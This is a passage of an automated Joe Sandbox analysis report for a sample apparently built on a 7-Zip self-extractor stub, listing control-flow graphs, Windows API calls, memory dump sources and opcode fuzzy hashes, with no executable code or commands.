                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                                        • String ID: 7zSfxString%d$XpA$\3A
                                                                                                        • API String ID: 2117570002-3108448011
                                                                                                        • Opcode ID: cea23e979b19b2ff836b241653c9f6f8570cf5dd123790f9bfcb5a4633df1eb3
                                                                                                        • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                                                                        • Opcode Fuzzy Hash: cea23e979b19b2ff836b241653c9f6f8570cf5dd123790f9bfcb5a4633df1eb3
                                                                                                        • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 680 401626-401636 681 401642-40166d call 40874d call 40a62f 680->681 682 401638-40163d 680->682 687 401680-40168c call 401411 681->687 688 40166f 681->688 683 401980-401983 682->683 694 401962-40197d ??3@YAXPAX@Z call 40eca9 687->694 695 401692-401697 687->695 689 401671-40167b call 40eca9 688->689 696 40197f 689->696 694->696 695->694 697 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 695->697 696->683 707 401948-40194b 697->707 708 4016d9-4016f8 697->708 709 40194d-401960 ??3@YAXPAX@Z call 40eca9 707->709 712 401713-401717 708->712 713 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 708->713 709->696 716 401719-40171c 712->716 717 40171e-401723 712->717 713->689 719 40174b-401762 716->719 720 401745-401748 717->720 721 401725 717->721 719->713 724 401764-401787 719->724 720->719 722 401727-40172d 721->722 726 40172f-401740 call 40eca9 ??3@YAXPAX@Z 722->726 730 4017a2-4017a8 724->730 731 401789-40179d call 40eca9 ??3@YAXPAX@Z 724->731 726->689 733 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 730->733 734 4017aa-4017ad 730->734 731->689 735 4017dc-4017df 733->735 737 4017b6-4017c2 734->737 738 4017af-4017b1 734->738 739 4017e1-4017eb call 403354 735->739 740 4017f8-4017ff call 40301a 735->740 737->735 738->722 739->726 745 4017f1-4017f3 739->745 744 401804-401809 740->744 746 401934-401943 GetLastError 744->746 747 40180f-401812 744->747 745->722 746->707 748 401818-401822 ??2@YAPAXI@Z 747->748 749 40192a-40192d 747->749 751 401833 748->751 752 401824-401831 748->752 749->746 753 401835-401859 call 4010e2 call 40db53 751->753 752->753 758 40190f-401928 call 408726 call 40eca9 753->758 759 40185f-40187d GetLastError call 4012f7 call 402d5a 753->759 758->709 768 4018ba-4018cf call 403354 759->768 769 40187f-401886 759->769 773 4018d1-4018d9 768->773 774 4018db-4018f3 call 40db53 768->774 772 40188a-40189a ??3@YAXPAX@Z 769->772 775 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 772->775 776 40189c-40189e 772->776 773->772 782 4018f5-401904 GetLastError 774->782 783 401906-40190e ??3@YAXPAX@Z 774->783 775->689 776->775 782->772 783->758
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e760e0c93036b197ddb3347365287eb95cb0b537a0f60c0ca06529ee100f634d
                                                                                                        • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                                                                        • Opcode Fuzzy Hash: e760e0c93036b197ddb3347365287eb95cb0b537a0f60c0ca06529ee100f634d
                                                                                                        • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1111 40301a-403031 GetFileAttributesW 1112 403033-403035 1111->1112 1113 403037-403039 1111->1113 1114 403090-403092 1112->1114 1115 403048-40304f 1113->1115 1116 40303b-403046 SetLastError 1113->1116 1117 403051-403058 call 402fed 1115->1117 1118 40305a-40305d 1115->1118 1116->1114 1117->1114 1120 40308d-40308f 1118->1120 1121 40305f-403070 FindFirstFileW 1118->1121 1120->1114 1121->1117 1123 403072-40308b FindClose CompareFileTime 1121->1123 1123->1117 1123->1120
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                                                                                        • SetLastError.KERNEL32(00000010), ref: 0040303D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesErrorFileLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1799206407-0
                                                                                                        • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                                                        • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                                                                                        • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                                                        • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                                                                                        APIs
                                                                                                        • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                                                                                        • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DiskFreeMessageSendSpace
                                                                                                        • String ID:
                                                                                                        • API String ID: 696007252-0
                                                                                                        • Opcode ID: 7556ddfb68cb10f5cb29c3a6588dee5ba643ce1babce3ea88c9fd262dc76ef2b
                                                                                                        • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                                                                                        • Opcode Fuzzy Hash: 7556ddfb68cb10f5cb29c3a6588dee5ba643ce1babce3ea88c9fd262dc76ef2b
                                                                                                        • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 786 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 789 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 786->789 790 411e66-411e71 __setusermatherr 786->790 793 411f05-411f08 789->793 794 411ecb-411ed3 789->794 790->789 795 411ee2-411ee6 793->795 796 411f0a-411f0e 793->796 797 411ed5-411ed7 794->797 798 411ed9-411edc 794->798 799 411ee8-411eea 795->799 800 411eec-411efd GetStartupInfoA 795->800 796->793 797->794 797->798 798->795 801 411ede-411edf 798->801 799->800 799->801 802 411f10-411f12 800->802 803 411eff-411f03 800->803 801->795 804 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 802->804 803->804
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                        • String ID: HpA
                                                                                                        • API String ID: 801014965-2938899866
                                                                                                        • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                                                        • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                                                                                        • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                                                        • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                                                        • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                                                        • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                                                        • DispatchMessageW.USER32(?), ref: 00401B89
                                                                                                        • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                                                        • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                                                        • String ID: Static
                                                                                                        • API String ID: 2479445380-2272013587
                                                                                                        • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                                        • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                                                                        • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                                        • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 810 40b163-40b183 call 40f0b6 813 40b2f6-40b2f9 810->813 814 40b189-40b190 call 40ac2d 810->814 817 40b192-40b194 814->817 818 40b199-40b1d6 call 40adc3 memcpy 814->818 817->813 821 40b1d9-40b1dd 818->821 822 40b202-40b221 821->822 823 40b1df-40b1f2 821->823 829 40b2a2 822->829 830 40b223-40b22b 822->830 824 40b297-40b2a0 ??3@YAXPAX@Z 823->824 825 40b1f8 823->825 828 40b2f4-40b2f5 824->828 825->822 826 40b1fa-40b1fc 825->826 826->822 826->824 828->813 831 40b2a4-40b2a5 829->831 832 40b2a7-40b2aa 830->832 833 40b22d-40b231 830->833 834 40b2ed-40b2f2 ??3@YAXPAX@Z 831->834 832->831 833->822 835 40b233-40b243 833->835 834->828 836 40b245 835->836 837 40b27a-40b292 memmove 835->837 838 40b254-40b258 836->838 837->821 839 40b25a 838->839 840 40b24c-40b24e 838->840 841 40b25c 839->841 840->841 842 40b250-40b251 840->842 841->837 843 40b25e-40b267 call 40ac2d 841->843 842->838 846 40b269-40b278 843->846 847 40b2ac-40b2e5 memcpy call 40dcfb 843->847 846->837 848 40b247-40b24a 846->848 849 40b2e8-40b2eb 847->849 848->838 849->834
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                                                                                        • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@memcpymemmove
                                                                                                        • String ID:
                                                                                                        • API String ID: 3549172513-3916222277
                                                                                                        • Opcode ID: b801c6dde5252ceaa95e99b7edc6e22ccd73079f9f68863dc15d2a8854d6de70
                                                                                                        • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                                                                                        • Opcode Fuzzy Hash: b801c6dde5252ceaa95e99b7edc6e22ccd73079f9f68863dc15d2a8854d6de70
                                                                                                        • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 851 403354-40337a lstrlenW call 4024fc 854 403385-403391 851->854 855 40337c-403380 call 40112b 851->855 857 403393-403397 854->857 858 403399-40339f 854->858 855->854 857->858 859 4033a2-4033a4 857->859 858->859 860 4033c8-4033d1 call 401986 859->860 863 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 860->863 864 4033b7-4033b9 860->864 867 4033e8-4033f6 call 40301a 863->867 868 4033ff-403408 call 401986 863->868 865 4033a6-4033ae 864->865 866 4033bb-4033bd 864->866 865->866 873 4033b0-4033b4 865->873 869 4033c3 866->869 870 403477-40347d 866->870 867->868 881 4033f8-4033fa 867->881 882 403419-40341b 868->882 883 40340a-403417 call 407776 868->883 869->860 877 4034a7-4034ba call 407776 ??3@YAXPAX@Z 870->877 878 40347f-40348a 870->878 873->866 874 4033b6 873->874 874->864 894 4034bc-4034c0 877->894 878->877 879 40348c-403490 878->879 879->877 885 403492-403497 879->885 889 40349c-4034a5 ??3@YAXPAX@Z 881->889 886 40346b-403475 ??3@YAXPAX@Z 882->886 887 40341d-40343c memcpy 882->887 883->881 885->877 891 403499-40349b 885->891 886->894 892 403451-403455 887->892 893 40343e 887->893 889->894 891->889 896 403440-403448 892->896 897 403457-403464 call 401986 892->897 895 403450 893->895 895->892 896->897 898 40344a-40344e 896->898 897->883 901 403466-403469 897->901 898->895 898->897 901->886 901->887
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                                                          • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                          • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                        • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 846840743-0
                                                                                                        • Opcode ID: 66febfc4c2029f219a7dc68f148c7269b5402702ab5f24a925c92116b663e397
                                                                                                        • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                                                                                        • Opcode Fuzzy Hash: 66febfc4c2029f219a7dc68f148c7269b5402702ab5f24a925c92116b663e397
                                                                                                        • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                                                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                          • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                                          • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                                          • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                          • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                                          • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                          • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                          • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                          • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                          • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                          • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                          • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                                          • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                                                                          • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                                                                        • wsprintfW.USER32 ref: 004044A7
                                                                                                          • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                                        • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                                        • String ID: 7zSfxFolder%02d$IA
                                                                                                        • API String ID: 3387708999-1317665167
                                                                                                        • Opcode ID: 79285842cd47b5abb211c01a777ae7e1b24040997c111ecd28553c2a093b01fa
                                                                                                        • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                                                        • Opcode Fuzzy Hash: 79285842cd47b5abb211c01a777ae7e1b24040997c111ecd28553c2a093b01fa
                                                                                                        • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 942 408ea4-408ebf call 40aef3 945 408ec1-408ecb 942->945 946 408ece-408f07 call 4065ea call 408726 942->946 951 408fd5-408ffb call 408d21 call 408b7c 946->951 952 408f0d-408f17 ??2@YAPAXI@Z 946->952 964 408ffd-409013 call 408858 951->964 965 40901e 951->965 953 408f26 952->953 954 408f19-408f24 952->954 956 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 953->956 954->956 962 408f73 956->962 963 408f63-408f71 956->963 966 408f75-408fae call 4010e2 call 408726 call 40cdb8 962->966 963->966 974 409199-4091b0 964->974 975 409019-40901c 964->975 968 409020-409035 call 40e8da call 40874d 965->968 995 408fb0-408fb2 966->995 996 408fb6-408fbb 966->996 983 409037-409044 ??2@YAPAXI@Z 968->983 984 40906d-40907d 968->984 981 4091b6 974->981 982 40934c-409367 call 4087ea 974->982 975->968 986 4091b9-4091e9 981->986 1004 409372-409375 982->1004 1005 409369-40936f 982->1005 987 409046-40904d call 408c96 983->987 988 40904f 983->988 997 4090ad-4090b3 984->997 998 40907f 984->998 1007 409219-40925f call 40e811 * 2 986->1007 1008 4091eb-4091f1 986->1008 993 409051-409061 call 408726 987->993 988->993 1017 409063-409066 993->1017 1018 409068 993->1018 995->996 999 408fc3-408fcf 996->999 1000 408fbd-408fbf 996->1000 1010 409187-409196 call 408e83 997->1010 1011 4090b9-4090d9 call 40d94b 997->1011 1006 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 998->1006 999->951 999->952 1000->999 1004->1006 1012 40937b-4093a2 call 40e811 1004->1012 1005->1004 1006->997 1045 409261-409264 1007->1045 1046 4092c9 1007->1046 1015 4091f7-409209 1008->1015 1016 4092b9-4092bb 1008->1016 1010->974 1022 4090de-4090e6 1011->1022 1031 4093a4-4093b8 call 408761 1012->1031 1032 4093ba-4093d6 1012->1032 1043 409293-409295 1015->1043 1044 40920f-409211 1015->1044 1033 4092bf-4092c4 1016->1033 1025 40906a 1017->1025 1018->1025 1029 409283-409288 1022->1029 1030 4090ec-4090f3 1022->1030 1025->984 1041 409290 1029->1041 1042 40928a-40928c 1029->1042 1037 409121-409124 1030->1037 1038 4090f5-4090f9 1030->1038 1031->1032 1109 4093d7 call 40ce70 1032->1109 1110 4093d7 call 40f160 1032->1110 1033->1006 1051 4092b2-4092b7 1037->1051 1052 40912a-409138 call 408726 1037->1052 1038->1037 1047 4090fb-4090fe 1038->1047 1041->1043 1042->1041 1054 409297-409299 1043->1054 1055 40929d-4092a0 1043->1055 1044->1007 1053 409213-409215 1044->1053 1056 409267-40927f call 408761 1045->1056 1059 4092cc-4092d2 1046->1059 1057 409104-409112 call 408726 1047->1057 1058 4092a5-4092aa 1047->1058 1049 4093da-4093e4 call 40e959 1049->1006 1051->1016 1051->1033 1075 409145-409156 call 40cdb8 1052->1075 1076 40913a-409140 call 40d6f0 1052->1076 1053->1007 1054->1055 1055->1006 1079 409281 1056->1079 1057->1075 1080 409114-40911f call 40d6cb 1057->1080 1058->1033 1063 4092ac-4092ae 1058->1063 1066 4092d4-4092e0 call 408a55 1059->1066 1067 40931d-409346 call 40e959 * 2 1059->1067 1063->1051 1086 4092e2-4092ec 1066->1086 1087 4092ee-4092fa call 408aa0 1066->1087 1067->982 1067->986 1088 409158-40915a 1075->1088 1089 40915e-409163 1075->1089 1076->1075 1079->1059 1080->1075 1092 409303-40931b call 408761 1086->1092 1103 409300 1087->1103 1104 4093e9-4093fe call 40e959 * 2 1087->1104 1088->1089 1095 409165-409167 1089->1095 1096 40916b-409170 1089->1096 1092->1066 1092->1067 1095->1096 1100 409172-409174 1096->1100 1101 409178-409181 1096->1101 1100->1101 1101->1010 1101->1011 1103->1092 1104->1006 1109->1049 1110->1049
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
